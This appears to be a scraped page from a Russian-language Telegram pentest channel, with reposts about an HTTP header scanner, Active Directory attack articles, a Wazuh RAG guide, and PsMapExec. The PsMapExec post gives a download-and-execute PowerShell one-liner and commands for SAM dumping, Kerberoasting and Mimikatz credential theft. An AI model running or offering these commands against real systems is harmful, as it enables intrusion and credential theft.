uk
Feedback
Fsecurity | HH

Fsecurity | HH

Відкрити в Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Показати більше
2 068
Підписники
Немає даних24 години
-47 днів
-330 днів
Архів дописів
Repost from Whitehat Lab
🕸 humble v1.48 Хороший анализатор HTTP заголовков В 🐧 Kali есть в репозиториях: sudo apt install humble Использование: pyth
🕸 humble v1.48 Хороший анализатор HTTP заголовков В 🐧 Kali есть в репозиториях:
sudo apt install humble
Использование:
python3 humble.py -u https://www.spacex.com
💻 Home #humble #web #pentest ✈️ Whitehat Lab

🔗Ссылка: https://opennet.ru/63145/

Repost from Whitehat Lab
💻 Цикл статей по Active Directory Ребят, нашел для вас неплохую подборку материалов по AD, да, местами используется устаревший софт, например crackmapexec, но база никуда не делась, все подробно и понятно, рекомендую к прочтению и освоению 👍 Part 1 | Trees, Forest and Trust Relations Part 2 | Access Control, Users, KRGBT, Golden ticket attack Part 3 | Recon with AD Module, Bloodhound, PowerView & Adalanche Part 4 | LLMNR Poisoning Part 5 | Lateral Movement, Privilege Escalation & Tools Part 6 | Domain persistence and cross forest attacks Part 7 | Abusing Misconfigured Templates (ESC1) #windows #activedirectory #pentest #redteam ✈️ Whitehat Lab

Как вам такой подарок ? 🤔
Anonymous voting

sticker.webp0.36 KB

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from Похек
Если вы работаете с Wazuh, то наверняка сталкивались с тем, что документация огромная, а найти нужную инфу быстро — задача не
Если вы работаете с Wazuh, то наверняка сталкивались с тем, что документация огромная, а найти нужную инфу быстро — задача не из простых. Но что если внедрить в этот процесс современные AI-инструменты? Именно об этом рассказывает свежая серия статей «Применение RAG для работы с документацией Wazuh» — и это реально must-read для всех, кто хочет выжать максимум из своих знаний по кибербезу! ➡️Что такое RAG и зачем он Wazuh? Retrieval-Augmented Generation (RAG) — это подход, который позволяет не просто генерировать ответы на вопросы, а делать это на основе релевантных кусков документации. То есть, вы не просто спрашиваете у бота, а получаете реально точный и проверяемый ответ, который подтягивается из вашей же базы знаний. В случае с Wazuh это превращается в мощный инструмент: автоматизация поиска, быстрый доступ к нужной инфе и реальный буст продуктивности. ➡️Часть 1: Готовим документацию Wazuh под RAG Первая статья — прям гайд для тех, кто хочет собрать документацию Wazuh локально и подготовить её для дальнейшей работы с RAG. Автор подробно рассказывает, как: ▪️Оценить и собрать актуальную документацию Wazuh с GitHub. ▪️Использовать Sphinx или Docker для локальной сборки, чтобы потом гонять по ней запросы. ▪️Конвертировать single HTML в PDF, если нужен именно такой формат для дальнейшей работы. Всё расписано пошагово, с командами и советами — разберётся даже тот, кто только начинает копать в сторону автоматизации документации. ➡️Часть 2: Настраиваем RAG на практике Если первая часть была разминкой, то во вторая часть — вы уже реально начинаете ебашить. Как поднять Ollama 3.2, как интегрировать LangChain, ChromaDB и Python для загрузки PDF-документации и создания векторного хранилища. Автор приводит рабочие куски кода для загрузки и разбиения PDF на чанки, объясняет, как настраивать эмбеддинги и как строить пайплайн для запросов к документации через Ollama. Особенно круто, что показан пример скрипта, который позволяет буквально «спросить у Wazuh» — и получить человеческий, развернутый ответ на английском, с реальными примерами использования системы. Всё это работает локально, без облаков и сторонних сервисов, что важно для бизнеса. ⬆️Возможно при использовании Ollama 4.0 результаты будут лучше. 💬Если вы работаете с Wazuh, как вы считаете - такие интеграции имеют смысл? И пора ли вендорам добавлять что-то аналогичное в свои продукты, чтобы выделяться на рынке и желательно упрощать, а не усложнять работу SOC?) 🌚 @poxek | 🌚 blog.poxek.cc | 📺 YT | 📺 RT | 📺 VK | 🌚 Мерч

Repost from Whitehat Lab
🔄 💻 PsMapExec v0.7.5 Отличный инструмент для пост эксплуатации в 💻 Active Directory, написанный на PowerShell. UPD. Начина
🔄 💻 PsMapExec v0.7.5 Отличный инструмент для пост эксплуатации в 💻 Active Directory, написанный на PowerShell. UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac. PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF Текущая поддержка методов (протоколов):
🔵RDP 🔵SessionHunter 🔵SMB 🔵SMB Signing 🔵Spraying 🔵VNC 🔵WinRM 🔵WMI 🔵MSSQL 🔵Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов 🔵 ConsoleHistory - история в PowerShell 🔵 Files - файлы в типичных директориях 🔵 KerbDump - дамп Kerberos билетов 🔵 eKeys - дамп ключей (Mimikatz) 🔵 LogonPasswords - дамп logon passwords (Mimikatz) 🔵 LSA - дамп LSA (Mimikatz) 🔵 NTDS - реализация DCsync 🔵 SAM - дамп SAM
Запуск из памяти:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
😹 Github 📔 Documentation #soft #pentest #powershell #psmapexec #redteam #windows ✈️ Whitehat Lab

👉🏻